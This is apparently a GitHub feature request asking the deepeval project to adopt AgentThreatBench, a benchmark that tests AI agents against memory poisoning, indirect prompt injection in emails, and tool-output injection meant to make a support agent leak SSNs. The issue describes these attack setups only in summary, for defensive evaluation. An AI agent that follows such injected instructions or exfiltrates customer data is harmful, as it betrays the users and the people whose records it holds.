Skip to content

Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark #2681

@vgudur-dev

Description

@vgudur-dev

Summary

AgentThreatBench is the first benchmark suite that operationalizes the OWASP Top 10 for Agentic Applications (2026) into executable evaluation tasks. It was merged into UKGovernmentBEIS/inspect_evals, the official evaluation suite maintained by the UK AI Safety Institute.

What it benchmarks

Three tasks targeting distinct agentic attack surfaces:

  • Memory Poison (ASI06) — Tests whether agents correctly answer questions from a memory store that contains adversarial entries (direct injection, context poisoning, gradual poisoning, authority impersonation, delimiter escape, role hijack)
  • Autonomy Hijack (ASI01) — Tests whether agents performing email triage resist indirect instruction injection embedded in email content returned by tools
  • Data Exfiltration (ASI01) — Tests whether a customer-support agent can be redirected via indirect injection in lookup_customer output into leaking SSNs/account numbers via send_message

Scoring approach

Uses a dual-metric approach: utility (task completion) + security (attack resistance) scored independently. This maps well to deepeval's metric architecture.

Proposal

Add AgentThreatBench as a built-in security benchmark in deepeval, similar to how deepeval already supports custom red-team metrics. The dataset is open-source.

Benchmark docs: https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/
Source: https://github.com/UKGovernmentBEIS/inspect_evals/tree/main/src/inspect_evals/agent_threat_bench
OWASP reference: https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions